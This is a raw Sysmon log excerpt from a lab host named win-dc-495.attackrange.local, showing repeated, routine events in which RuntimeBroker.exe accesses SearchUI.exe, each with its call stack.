13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
